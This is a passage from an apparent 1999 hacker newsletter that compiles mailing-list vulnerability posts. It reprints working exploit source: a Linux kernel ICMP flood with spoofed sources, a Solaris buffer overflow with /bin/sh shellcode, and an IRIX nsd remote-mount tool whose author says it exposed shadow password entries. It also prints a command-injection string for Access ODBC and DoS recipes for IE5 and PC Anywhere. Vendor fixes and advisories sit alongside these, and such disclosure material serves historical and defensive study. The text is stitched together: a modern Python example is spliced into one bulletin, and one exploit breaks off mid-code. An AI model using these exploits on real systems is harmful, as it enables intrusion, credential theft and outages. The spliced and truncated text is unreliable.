> Version 2.0 is just as vulnerable.
>
> The commercial version (the one that runs on NT too :) is _not_ vulnerable
> since it does its own socket thing instead of starting 'whois'.
>
> I've known of this bug in cdomain for about 6 months but never got around
> to writing up an advisory...

To elaborate this a bit further: cdomain-free 2.4 and lower are _vulnerable_. cdomain-free 2.5 and all commercial cdomain versions I've seen are _not_ vulnerable, because they connect to the whois servers themselves.

cdomain-free is available for download at www.cdomain.com.

Greetz, Peter
--
| 'He broke my heart,  | Peter van Dijk
| I broke his neck'    | peter@attic.vuurwerk.nl
| nognikz - As the sun | Hardbeat@ircnet - #cistron/#linux.nl
|                      | Hardbeat@undernet - #groningen/#kinkfm/#vdh |

@HWA

19.0 Linux kernel 2.2.x vulnerability/exploit
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From PacketStorm http://www.genocide2600.com/~tattooman/new.shtml

Date: Tue, 1 Jun 1999 17:43:17 +0200
From: Piotr Wilkin To: BUGTRAQ@netspace.org Subject: Linux kernel 2.2.x vulnerability/exploit I'm sorry if this has been noticed before, but since I did't find anything in the archives, I post it here. There seems to be a bug in kernels 2.2.x (tested on 2.2.7 and 2.2.9), that causes them to panic when they are sent a large number of specific ICMP packages. I think the problem comes from the combination of the mangled header length (shorter or longer ihl's don't cause hangup) and the random ICMP packets (random type/subtype and source address) this program sends. Windows 9x and FreeBSD 3.0 seem to be unaffected. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Here is the program source (under Linux): -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- #include #include #include #include #include #include #include #include #include #include #include #include struct icmp_hdr { struct iphdr iph; struct icmp icp; char text[1002]; } icmph; int in_cksum(int *ptr, int nbytes) { long sum; u_short oddbyte, answer; sum = 0; while (nbytes > 1) { sum += *ptr++; nbytes -= 2; } if (nbytes == 1) { oddbyte = 0; *((u_char *)&oddbyte) = *(u_char *)ptr; sum += oddbyte; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return(answer); } struct sockaddr_in sock_open(char *address, int socket, int prt) { struct hostent *host; if ((host = gethostbyname(address)) == NULL) { perror("Unable to get host name"); exit(-1); } struct sockaddr_in sin; bzero((char *)&sin, sizeof(sin)); sin.sin_family = PF_INET; sin.sin_port = htons(prt); bcopy(host->h_addr, (char *)&sin.sin_addr, host->h_length); return(sin); } void main(int argc, char **argv) { int sock, i, ctr, k; int on = 1; struct sockaddr_in addrs; if (argc < 3) { printf("Usage: %s \n", argv[0]); exit(-1); } for (i = 0; i < 1002; i++) { icmph.text[i] = random() % 255; } sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1) { perror("Can't set IP_HDRINCL option on 
socket"); } if (sock < 0) { exit(-1); } fflush(stdout); for (ctr = 0;ctr < 1001;ctr++) { ctr = ctr % 1000; addrs = sock_open(argv[1], sock, atoi(argv[2])); icmph.iph.version = 4; icmph.iph.ihl = 6; icmph.iph.tot_len = 1024; icmph.iph.id = htons(0x001); icmph.iph.ttl = 255; icmph.iph.protocol = IPPROTO_ICMP; icmph.iph.saddr = ((random() % 255) * 255 * 255 * 255) + ((random() % 255) * 65535) + ((random() % 255) * 255) + (random() % 255); icmph.iph.daddr = addrs.sin_addr.s_addr; icmph.iph.frag_off = htons(0); icmph.icp.icmp_type = random() % 14; icmph.icp.icmp_code = random() % 10; icmph.icp.icmp_cksum = 0; icmph.icp.icmp_id = 2650; icmph.icp.icmp_seq = random() % 255; icmph.icp.icmp_cksum = in_cksum((int *)&icmph.icp, 1024); if (sendto(sock, &icmph, 1024, 0, (struct sockaddr *)&addrs, sizeof(struct sockaddr)) == -1) { if (errno != ENOBUFS) printf("X"); } if (ctr == 0) printf("b00m "); fflush(stdout); } close(sock); } -------------------------------------------------------------------------------- Date: Tue, 1 Jun 1999 23:30:33 +0100 From: Alan Cox To: BUGTRAQ@netspace.org Subject: Linux 2.2 DoS attack Ok problem confirmed. Its not icmp however - in fact the program given has some bugs that cause it. If it had been a correctly written icmp tester it wouldnt have worked. A blessing in disguise. Anyway the fix seems to be this. Sorry it took so long to sort out. --- ../linux.vanilla/net/ipv4/ip_options.c Wed May 12 16:49:38 1999 +++ net/ipv4/ip_options.c Tue Jun 1 22:11:46 1999 @@ -452,7 +452,6 @@ error: if (skb) { icmp_send(skb, ICMP_PARAMETERPROB, 0, htonl((pp_ptr-iph)<<24)); - kfree_skb(skb); } return -EINVAL; } Alan @HWA 20.0 New Allaire Security Bulletin (ASB99-09) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From PacketStorm http://www.genocide2600.com/~tattooman/new.shtml Date: Tue, 1 Jun 1999 11:45:35 -0700 
From: aleph1@UNDERGROUND.ORG
To: BUGTRAQ@netspace.org
Subject: New Allaire Security Bulletin (ASB99-09)

Dear Allaire Customer --

We have recently become aware of a serious security vulnerability that may affect customers using Microsoft Access with ColdFusion. This issue is not a problem with ColdFusion, but can occur when using some versions of the Microsoft Access ODBC driver. We have created a new Allaire Security Bulletin that documents this issue and the steps that customers can take to protect themselves.

If you are using Microsoft Access with your Web applications we strongly recommend that you review this new bulletin:

ASB99-09: Solutions to Issues that Allow Users to Execute Commands through Microsoft Access

You can find this new bulletin and information about other security issues in the Allaire Security Zone:

http://www.allaire.com/security

As a Web application platform vendor, one of our highest concerns is the security of the systems our customers deploy. We understand how important security is to our customers, and we're committed to providing the technology and information customers need to build secure Web applications. Allaire has set up an email address that customers can use to report security issues associated with an Allaire product: secure@allaire.com.

Thank you for your time and consideration on this issue.

-- Allaire Security Response Team

----------------------------------------------------------------------------------------

Allaire Security Bulletin (ASB99-09)
Solutions to Issues that Allow Users to Execute Commands through Microsoft Access

Originally Posted: June 1, 1999
Last Updated: June 1, 1999

Summary

Some Microsoft ODBC drivers for Microsoft Access may allow users to execute Visual Basic for Applications (VBA) commands on the hosted server without permission. URL, form and cookie variables in a dynamic query in many development environments (e.g. ColdFusion, ASP, CGI, etc.) can be used to exploit this hole by appending malicious VBA statements to existing queries. This problem can be easily fixed by upgrading to the Microsoft ODBC driver for Access included in MDAC 2.1 sp1a, available from Microsoft. In general, Allaire recommends that customers use proper coding methods for validating dynamic query variables passed on URL strings, http forms or cookies. This is not a security issue with ColdFusion itself. However, ColdFusion customers using Access are vulnerable to this issue. (This issue is similar to the vulnerabilities documented in ASB99-04, which are associated with appending malicious SQL statements to query strings sent to some enterprise databases.)

Issue

In a Web application there are often circumstances where queries are built dynamically using variables that are passed on URLs or in forms. Some versions of the Microsoft Access ODBC driver support the ability to append VBA commands to a SQL string. As a result, a malicious attack could be made by using URL, form or cookie variables to send VBA commands through a query. These VBA commands could potentially be used to damage the server or to gain unauthorized access to information and systems. (The potential for a similar problem using SQL statements and some enterprise databases was documented in ASB99-04).

Some versions of the Microsoft Access ODBC driver allow for appending VBA commands to a SQL string. The VBA commands are appended by using the pipe character, or Chr(124), which is treated as a reserved character by the Access ODBC driver. See the following MS Knowledge Base article for details:

http://support.microsoft.com/support/kb/articles/q147/6/87.asp

This reserved character allows users to modify a URL, form or cookie variable to execute VBA commands against the Web server using the ODBC driver. The following string is an example of one that can be used to initiate an attack by writing a file to the web server’s hard drive:

'|shell("cmd /c 1 > c:\temp\foo.txt")|'

This string could be passed to an application using a URL variable, so the page could be called as follows:

http://myserver/page.cfm?x='|shell("cmd /c 1 > c:\temp\foo.txt")|'

This code, when executed as part of the following dynamically created query, will cause a file to be created at the location c:\temp\foo.txt.

SELECT * FROM USERS WHERE lname = '#URL.X#'

This code could also be vulnerable when processing form input from a template using a form variable called 'X'. Please note that you should always validate user-initiated input, including URL, form, and cookie variables.

Affected Software Versions

ColdFusion Server (all versions and editions) running with Microsoft Access through ODBC

What Allaire is Doing

This issue is not a problem with ColdFusion, but can occur when using Microsoft Access and some versions of the Access ODBC driver. It is not a problem with ColdFusion, but it can affect ColdFusion applications that use Access. To respond to this issue, Allaire has published an Allaire Security Bulletin (ASB99-09) notifying customers of the problem and remedies that can be used to address it. We have sent a notification of the bulletin to customers who have subscribed to Allaire Security Notifications.

What Customers Should Do

This issue appears to be fixed by the installation of the Microsoft Access ODBC driver included with MDAC 2.1 sp1a. We strongly recommend that customers install this ODBC driver. It should not adversely affect the functionality of ColdFusion applications using Access. This MDAC can be downloaded from the Microsoft site:

http://download.microsoft.com/msdownload/mdac/sp1a/x86/en/mdac_typ.exe

In addition, Allaire recommends that customers write their code to validate variables that are passed into SQL statements, configure their database security properly, and use standard database application development practices such as stored procedures where appropriate to protect themselves. These are general requirements of production applications regardless of the development platform.

There are many ways to address the issues raised by the risk of malicious SQL statements being inserted into dynamic queries. The Allaire Technical Brief – Securing Databases for ColdFusion Applications, details some of the steps you can take to secure your databases. It is important to note that each individual application may require its own particular steps in both coding and database configuration in order to be fully secured. Some of the techniques for securing database applications built with ColdFusion are detailed in the Allaire Technical Brief - Securing Databases for ColdFusion Applications.

Revisions

June 1, 1999 -- Bulletin first released.

Reporting Security Issues

Allaire is committed to addressing security issues and providing customers with the information on how they can protect themselves. If you identify what you believe may be a security issue with an Allaire product, please send an email to secure@allaire.com. We will work to appropriately address and communicate the issue.

Receiving Security Bulletins

When Allaire becomes aware of a security issue that we believe significantly affects our products or customers, we will notify customers when appropriate. Typically this notification will be in the form of a security bulletin explaining the issue and the response. Allaire customers who would like to receive notification of new security bulletins when they are released can sign up for our security notification service.

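
Added example (not part of the Allaire bulletin, and not ColdFusion code): one way to apply the bulletin's advice to validate variables passed into SQL statements, using its lname lookup. It is written in Python with an in-memory SQLite table standing in for the Access data source; the allow-list policy, the function names and the sample values are assumptions made for this example.

```python
import re
import sqlite3

# Chr(124): the character the bulletin says the Access ODBC driver treats as reserved.
RESERVED_PIPE = chr(124)

# Allow-list for a last name (policy assumed for this example): starts with a
# letter, then letters, spaces, periods, hyphens or apostrophes, 64 chars at most.
LNAME_RE = re.compile(r"[A-Za-z][A-Za-z .'-]{0,63}")

# Constructed request values for the URL variable X. The last two carry the
# reserved character; "placeholder" stands in for any appended expression.
SAMPLE_VALUES = ["Smith", "O'Brien", "a|b", "'|placeholder|'"]


def build_dynamic_query(x):
    """The risky pattern from the bulletin: the variable becomes part of the SQL text."""
    return "SELECT * FROM USERS WHERE lname = '" + x + "'"


def validate_lname(x):
    """Return x unchanged if it matches the allow-list, otherwise raise ValueError."""
    if not isinstance(x, str) or LNAME_RE.fullmatch(x) is None:
        raise ValueError("lname rejected: %r" % (x,))
    return x


def make_demo_db():
    """In-memory SQLite table standing in for the USERS table behind the ODBC source."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE USERS (id INTEGER PRIMARY KEY, lname TEXT)")
    conn.executemany("INSERT INTO USERS (lname) VALUES (?)",
                     [("Smith",), ("O'Brien",)])
    return conn


def lookup(conn, x):
    """Validate first, then hand the value to the driver as a bound parameter."""
    value = validate_lname(x)
    cur = conn.execute("SELECT id, lname FROM USERS WHERE lname = ?", (value,))
    return cur.fetchall()


def triage(conn, values):
    """For each value report (value, pipe_in_sql_text, outcome).

    pipe_in_sql_text: would plain concatenation put Chr(124) into the SQL string?
    outcome: rows from the validated, parameterized lookup, or "rejected".
    """
    report = []
    for v in values:
        pipe_in_sql_text = RESERVED_PIPE in build_dynamic_query(v)
        try:
            outcome = lookup(conn, v)
        except ValueError:
            outcome = "rejected"
        report.append((v, pipe_in_sql_text, outcome))
    return report


if __name__ == "__main__":
    for row in triage(make_demo_db(), SAMPLE_VALUES):
        print(row)
```

The value O'Brien passes the allow-list yet would still unbalance the quotes if concatenated, which is why the lookup binds the value as a parameter in addition to validating it.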
For additional information on security issues at Allaire, please visit: http://www.allaire.com/security THE INFORMATION PROVIDED BY ALLAIRE IN THIS BULLETIN IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. ALLAIRE DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL ALLAIRE CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF ALLAIRE CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY. @HWA 21.0 sdtcm_convert Overflow Exploits( for Intel Solaris 7) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From PacketStorm http://www.genocide2600.com/~tattooman/new.shtml *============================================================================= sdtcm_convert Overflow Exploits( for Intel Solaris 7) The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551) Written by UNYUN (unewn4th@usa.net) [usage] % gcc ex_sdtcm_convert86.c (This example program) % a.out If no response, hit ctrl+c # ============================================================================= */ #define ADJUST 1 #define OFFSET0 6268 #define OFFSET1 4400 #define LENGTH1 600 #define OFFSET2 5000 #define LENGTH2 3000 #define OFFSET3 6000 #define NOP 0x90 char exploit_code[] = "\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0" "\x8d\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff" "\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0" "\x17\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff" "\x55\x8b\xec\x83\xec\x08\xeb\x50\x33\xc0\xb0\x3b\xeb\x16\xc3\x33" "\xc0\x40\xeb\x10\xc3\x5e\x33\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88" 
"\x7e\x06\xeb\x05\xe8\xec\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f" "\xc3\x5e\x33\xc0\x89\x76\x08\x88\x46\x07\x89\x46\x0c\x50\x8d\x46" "\x08\x50\x8b\x46\x08\x50\xe8\xbd\xff\xff\xff\x83\xc4\x0c\x6a\x01" "\xe8\xba\xff\xff\xff\x83\xc4\x04\xe8\xd4\xff\xff\xff/bin/sh"; unsigned long get_sp(void) { __asm__(" movl %esp,%eax "); } unsigned long ret_adr; int i; main() { static char x[11000]; putenv("LANG="); memset(x,'a',10000); ret_adr=get_sp()-OFFSET0; for (i = 0; i < 5000 ; i+=4){ x[i+0]=ret_adr & 0xff; x[i+1]=(ret_adr >> 8 ) &0xff; x[i+2]=(ret_adr >> 16 ) &0xff; x[i+3]=(ret_adr >> 24 ) &0xff; } ret_adr=get_sp()-11700; if ((ret_adr & 0xff )==0) ret_adr+=4; printf("Jumping Address = %lx\n",ret_adr); for (i = OFFSET1+ADJUST; i < OFFSET1+LENGTH1 ; i+=4){ x[i+0]=ret_adr & 0xff; x[i+1]=(ret_adr >> 8 ) &0xff; x[i+2]=(ret_adr >> 16 ) &0xff; x[i+3]=(ret_adr >> 24 ) &0xff; } for (i = OFFSET2; i To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: ActiveState Security Advisory Problem -------- PerlScript and Perl-ISAPI that come with ActivePerl 516 and earlier versions, inadequately check the length of path information sent to open(). Due to limits on path and filename length in Windows, this can crash IIS if sufficiently large strings are provided as paths or filenames. Solution --------- This is fixed in ActivePerl 517 Work Around ------------ If you are unable to upgrade to ActivePerl 517 then all path information should be checked for sane lengths before being passed to open(). The maximum length of a path, including drive, directory and filename is 259 characters. The maximum length of the filename portion of a path is 255 characters. The maximum length of the directory portion of a path is 255 characters. example: $filename = substr $filename, 0, 255; open FOO, ">$filename"; General Comments ----------------- Care should be taken when accepting input from users, especially in a web context where users are untrusted and relatively anonymous. 
When designing CGI scripts some thought should be given to checking user input for sane values. Use of taint mode and warnings (-t and -w) are also highly recommended.

The Activators.

@HWA

23.0 Exploit in Internet Explorer 5.0
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From PacketStorm http://www.genocide2600.com/~tattooman/new.shtml

Date: Mon, 31 May 1999 16:18:02 GMT
From: THR -
To: BUGTRAQ@netspace.org
Subject: Exploit in Internet Explorer 5.0

Hi everyone!

I have found a bug which will freeze Internet Explorer 5.0. I know that there are *many* bugs that will crash browsers but what makes this one special is the following:

In IE 5.0 Microsoft has fixed the bugs from IE 4.0 that were based on infinite loops in JavaScript. If a JavaScript contains a loop which will cause IE 5.0 to run slowly or be unresponsive, the user will be warned and he/she will be prompted whether the JavaScript should be aborted or not.

This exploit is a JavaScript which changes the bgColor in an infinite loop and when you open it you won't get a warning. The browser will just freeze!

Get the source code here: http://members.xoom.com/thr_/my/color.txt

//THR
WWW: http://fly.to/unixhacking

---------------------------------------------------------------------

24/5 1999

This is a new exploit which affects Microsoft Internet Explorer 5.0. When you enter the html document below, IE will freeze and you have to close it with ctrl + alt + del.

//THR
WWW: http://fly.to/unixhacking

-----------Cut here------color.htm--------Start---------
-----------Cut here------color.htm--------End---------

@HWA

24.0 IRIX 6.5 nsd virtual filesystem vulnerability
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From PacketStorm http://www.genocide2600.com/~tattooman/new.shtml

Date: Mon, 31 May 1999 03:56:37 -0400
From: "Jefferson Ogata (JO317)" To: BUGTRAQ@netspace.org Subject: IRIX 6.5 nsd virtual filesystem vulnerability I've been waiting since February for SGI to post an advisory about this. Enough. /****************************************************************************** IRIX 6.5 nsd virtual filesystem exploit Author: Jefferson Ogata (JO317) Please note that this program comes with NO WARRANTY WHATSOEVER. Your use of this program constitutes your complete acceptance of all liability for any damage or loss caused by the aforesaid use. It is provided to the network community solely to document the existence of a vulnerability in the security implementations of certain versions of IRIX, and may not be used for any illicit purpose. Many of the details of the bug this program exploits have been available to users of SGI's online support system since February 1999. The current revision of IRIX (6.5.3) corrects this bug, at least enough to stop this particular exploit, and I strongly encourage you to bring your systems up to date as quickly as possible. With IRIX 6.5, SGI has moved all name services, NIS services, and DNS lookups into a userland process called nsd, which exports the results of the queries it fields into a virtual filesystem. The virtual filesystem is normally mounted onto the directory /ns by the program /sbin/nsmount, which is invoked by nsd on startup. The nsd daemon itself is exporting the filesystem via NFS3 over a dynamically bound UDP port -- rather than a well-known or settable one -- typically in the 1024-1029 range. On a desktop system, 1024 is a good bet, since nsd is usually the first RPC/UDP service to be started. The NFS filesystem is not registered with mountd, so there is no way to query mountd for a mount filehandle. 
But because the NFS port is fairly easy to discover through port scanning, and because the mount filehandle nsd uses is simply a string of 32 zeroes, it is trivial to mount the nsd filesystem from a host anywhere on the Internet. nsd will serve an array of NFS requests to anyone. Furthermore, because the service's NFS port is bound dynamically, it is difficult to protect it with a firewall; it may change from one system start to another, or if the daemon is killed and restarted. This program can successfully mount the nsd-exported virtual filesystem >from a remote host onto a machine running IRIX 6.4 or higher. It makes use of the MS_DOXATTR mount flag defined in IRIX 6.4 and higher. I do not know what this flag does at the NFS protocol level, but it allows the client to ask the NFS server not to enforce certain permissions controls against the client. I don't know whether any other vendor NFS client systems support this flag. A clever person might write a userland NFS client that would accept an initial handle, NFS port, etc. as arguments. On an SGI with SGI C compiler, compile with: cc -o nsdadv nsdadv.c Run it this way: nsdadv /mnt sucker.example.com 1024 with obvious substitutions. So what are the security implications of this? Well, at the very least, the nsd filesystem on an NIS server reveals the NIS domain name, and what maps it contains, as well as what classes are being used. By exploring the filesystem shortly after it has been mounted I have been able to retrieve data that should be hidden from me, including shadow password entries from a remote system's shadow file. Beyond retrieving keys and maps, you can also monitor the filesystem for changes. A great deal of information is leaked through the contents of the nsd filesystem. For example, if host A looks up a host B's IP address, a file named B will appear in the /.local/hosts.byname directory in A's nsd filesystem. The file's contents will be the IP address. 
By the way, though you be unable to chdir into a particular location in the nsd filesystem, you may yet succeed under slightly different conditions. Eventually you can do it. I'm not sure why or when, but nsd gets picky sometimes. Eventually it relents. Specifically, I've found that the entire nsd filesystem appears readable for a few seconds after it is initially mounted. If you can't look at something, unmount the filesystem, remount it, and try again immediately. It also seems that a stat() is sometimes required before a chdir(). Your mileage may vary, but keep trying. You may wish to write a script to mount the nsd filesystem, explore and take inventory of its contents, and unmount the filesystem quickly. Once you've chdir'd into a directory, it appears you can always read it, although you can't necessarily stat its contents. This suggests a strategy of spawning a group of processes each with its cwd set to a subdirectory of the nsd filesystem, in order to retain visibility on the entire filesystem. Each process would generate an inventory of its cwd, and then monitor it for changes. A Perl script could do this well. Another thing: it is possible to create an empty file in nsd's exported filesystem simply by stat()ing a nonexistent filename. This suggests a potential DoS by creating many files in a directory. Remember that the system keeps a local cache in /var/ns, so you may have to wait for cached entries on the target host to expire before you'll see them reappear in the virtual filesystem. For some fairly extensive info on the nsd implementation, take a look at: http://www.bitmover.com/lm/lamed_arch.html ****** What got me into all this was that I found I could no longer run services chrooted if they required DNS. It took considerable effort to come up with a solution to this. 
This was a fundamental change from IRIX 6.4, and I know I'm not the only one who finds the nsd implementation to be a generally unpleasant direction, in part because it causes umount -t nfs to break system database services. I give SGI points for creativity -- in one sense, using NFS as a database access system is a very slick approach. But the database needs a security model, and the model needs to be implemented correctly. Neither of these needs appears to have been met. So how could SGI fix this? Without going back, SGI could at least make nsd respond only to queries >from localhost (see note below about IRIX 6.5.3). The problem here is that they actually intend to support remote mounts in later releases, in order to supplement or supplant other means of distribution. The web documents indicate this. They could create a well-randomized mount filehandle for the filesystem and pass that to nsmount. Then you couldn't remotely mount the filesystem without guessing the handle -- nontrivial with a 32-byte handle. At the very least, they should provide libraries of regular BIND resolver routines, file-based getpwent, etc. routines, so one could choose the resolution strategy at link time, perhaps by modifying the shared library path. ****** With IRIX release 6.5.3, SGI appears to have fixed this problem, at least to some degree. The exploit does not appear to work as it does against 6.5.2. Further testing is needed, and the behavior should be watched carefully in future versions of IRIX. ******************************************************************************/ #include #include #include #include #include #include #include #include #include #include #include #include #include #include /* Filesystem type name for nsd-exported filesystem. */ #define NSD_FSTYPE "nfs3" /* File the records mounted filesystems. */ #define MTAB_FILE "/etc/mtab" /* Socket address we'll fill in with our destination IP and port. */ struct sockaddr_in sin; /* All zero file handle. 
This appears to be the base handle for the nsd filesystem. Great security, huh? */ unsigned char fh[NFS_FHSIZE] = { 0 }; /* NFS mount options structure to pass to mount(2). The meanings of these are documented to some extent in /usr/include/sys/fs/nfs_clnt.h. The flags field indicates that this is a soft mount without log messages, and to set the initial timeout and number of retries from fields in this structure. The fh field is a pointer to the filehandle of the mount point, whose size is set by fh_len. As noted above, the mount point filehandle is just 32 zeroes. */ struct nfs_args nx = { &sin, /* addr */ (fhandle_t *) fh, /* fh */ NFSMNT_SOFT|NFSMNT_TIMEO|NFSMNT_RETRANS|NFSMNT_NOAC, /* flags */ 0, /* wsize */ 0, /* rsize */ 100, /* timeo */ 2, /* retrans */ 0, /* hostname */ 0, /* acregmin */ 0, /* acregmax */ 0, /* acdirmin */ 0, /* acdirmax */ 0, /* symttl */ { 0 }, /* base */ 0, /* namemax */ NFS_FHSIZE, /* fh_len */ /* On IRIX 6.4 and up there are also the following... */ /* bdsauto */ /* bdswindow */ /* On IRIX 6.5 there are also the following... */ /* bdsbuflen */ /* pid */ /* maxthreads */ }; void usage (void) { fprintf (stderr, "usage: nsmount_remote directory host port\n\n"); fprintf (stderr, "NFS-mounts the virtual filesystem exported by nsd on via NSD daemon\n"); fprintf (stderr, "port onto .\n\n"); exit (1); } int main (int argc, char **argv) { char *dir; char *host; char *ports; int port; struct hostent *h; int fstype; FILE *mtabf; struct mntent mnt = { 0, 0, NSD_FSTYPE, "soft,timeo=100,retrans=2", 0, 0, }; if (argc != 4) usage (); dir = argv[1]; host = argv[2]; port = atoi ((ports = argv[3])); /* Prepare for host lookup. */ memset ((void *) &sin, 0, sizeof (sin)); sin.sin_family = 2; sin.sin_port = port; /* Look up the host. 
  */
  if (inet_aton (host, &sin.sin_addr))
    ;
  else if ((h = gethostbyname (host)))
    {
      unsigned long *l = (unsigned long *) *(h->h_addr_list);
      sin.sin_addr.s_addr = l[0];
    }
  else
    {
      fprintf (stderr, "Cannot resolve host %s.\n", host);
      return 1;
    }

  /* Get filesystem type index for nsd filesystem type. */
  if ((fstype = sysfs (GETFSIND, NSD_FSTYPE)) < 0)
    {
      perror ("sysfs (" NSD_FSTYPE ")");
      return 1;
    }

  fprintf (stderr, "Mounting nsd " NSD_FSTYPE " fs from %s(%s):%d onto %s\n",
           host, inet_ntoa (sin.sin_addr), port, dir);

  /* These flags are documented in /usr/include/sys/mount.h. MS_DOXATTR
     means "tell server to trust us with attributes" and MS_DATA means
     "6-argument mount".

     MS_DOXATTR is a mount option in IRIX 6.4 and up. The attack doesn't
     seem to work without this option. So even though this program will
     compile on IRIX 6.2, you need to use an IRIX 6.4 or higher OS to
     attack nsd. */
  if (mount (dir, dir, MS_DOXATTR|MS_DATA, (char *) fstype, &nx, sizeof (nx)) != 0)
    {
      perror ("mount");
      return 1;
    }

  /* Record mount point in /etc/mtab. */
  mnt.mnt_fsname = malloc (strlen (host) + sizeof (":nsd@") + strlen (ports) + 1);
  sprintf (mnt.mnt_fsname, "%s:nsd@%s", host, ports);
  mnt.mnt_dir = dir;
  if (!(mtabf = setmntent (MTAB_FILE, "r+")))
    {
      perror ("setmntent");
      return 1;
    }
  if (addmntent (mtabf, &mnt) < 0)
    {
      perror ("addmntent");
      return 1;
    }
  if (endmntent (mtabf) < 0)
    {
      perror ("endmntent");
      return 1;
    }

  return 0;
}

@HWA

25.0 a practical attack against ZKS Freedom
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From PacketStorm http://www.genocide2600.com/~tattooman/new.shtml

Date: Sat, 29 May 1999 15:30:24 -0700
From: Wei Dai
To: cypherpunks@toad.com, coderpunks@toad.com
Subject: a practical attack against ZKS Freedom

Although the ZKS Freedom AIP protocol (as described in version 1.0 of the ZKS whitepaper) is conceptually similar to the PipeNet protocol, there are several attacks against ZKS which PipeNet is not susceptible to. The reason is that PipeNet uses end-to-end traffic padding, whereas ZKS only uses link padding. I came up with several attacks against link padding systems while developing PipeNet, which is why I ultimately chose end-to-end padding.

However one can argue that end-to-end padding is too costly, and that these attacks are not practical because they require a global observer or the cooperation of one or more of the anonymous router (AIP) operators. ZKS has not publicly made this argument, but since they are probably aware of these earlier attacks they must have followed its reasoning. I hope the practicality of the new attack presented here will change their mind.

In this attack, a user creates an anonymous route from himself through a pair of AIPs back to himself. He then increases the traffic through this route until total traffic between the pair of AIPs reaches the bandwidth limit set by the ZKS Traffic Shaper. At this point the AIPs no longer send any padding packets to each other, and the real traffic throughput between them can be deduced by subtracting the traffic sent by the attacker from the bandwidth limit.

This attack implies that link padding buys virtually no security. An attacker, without access to network sniffers or cooperation of any AIP operator, can strip off link padding and obtain real-time throughput data between all pairs of AIPs. If end-to-end padding is not used, this data would correlate with traffic throughput of individual users, and statistical analysis could then reveal their supposedly anonymous routes.
@HWA

26.0 DoS against PC Anywhere
     ~~~~~~~~~~~~~~~~~~~~~~~~

From PacketStorm http://www.genocide2600.com/~tattooman/new.shtml

Date: Fri, 28 May 1999 12:02:15 -0700
From: Chris Radigan
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: DoS against PC Anywhere

Hello all,

This is my first post to the group so I'll try to keep it as brief as possible.

Searching through the bugtraq archives, I came across articles 001732, 001734, 001737, and 001739 regarding PC Anywhere. So, I fired up my telnet client, pointed it at port 5631 on a non-production host, and pasted about 512kb of garbage (I copied & pasted a dll I opened in notepad) into it when PC Anywhere responded with "Please press <Enter>". About 200k through this dump, PC Anywhere hangs, utilizing 100% of the CPU, rendering the target host useless but not crashing it. There's your DoS.

I ran this attack over TCP/IP against a couple of fully patched NT 4.0 Workstations (SP4), and a couple of fully patched NT 4.0 Servers (SP4), with 802up_a, 802up_b, and hostup_b applied to PC Anywhere. RAS was not installed on any of the hosts. I got the same results on all machines.

I got in touch with Symantec development and found out that they do have a fix for this problem, it's a patched aw32tcp.dll, it just hasn't made it to their website yet. I have applied this fix to several machines (all with the aforementioned PC Anywhere patches applied) and it does indeed fix the problem.

Hope this info will help. Thanks for your time.

Chris

-----------------------------------------------------------------------------

Date: Mon, 31 May 1999 22:24:50 +0200
From: MrJay@GMX.NET
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: DoS against PC Anywhere

Hello TRAQers,

this is my second list-posting attempt, so please bear with me. Flames will be sent to /dev/nul anyways ;)

Concerning PC Anywhere 32 v8.0x, I tried the following attacks:

NT 4.0 Workstation (SP4) vs. NT 4.0 Workstation (SP4)
and
Win 98 (no patches, from what I was told) vs same NT 4.0 Workstation (SP4)

All NT 4.0 running PC Anywhere 32 8.0 patched with formerly mentioned Updates except the aw32tcp.dll, which wasn't available to me.

Major difference between Chris' and this version: I tested against the German version of PC Anywhere 32. RAS installed, no fancy firewalls, no 'special' security implemented.

Not surprisingly the German Version of PC Anywhere didn't react much different. It hung when I posted those ~500KB of trash from the NT 4.0 attacker machine to Port 5631 of the PC Anywhere Host. Result: 100% CPU load, further connections blocked though the Host machine itself still worked fine and was able to terminate the aw32host service by simply re-starting the Host mode in PC Anywhere.

The more interesting one was the Win98 attack. Same procedure, different result. After pasting those 500KB the Server jumps to 100% load for some seconds while working through the trash then it drops back to normal with the attacker's Telnet session again prompting for pressing the 'Enter' key.

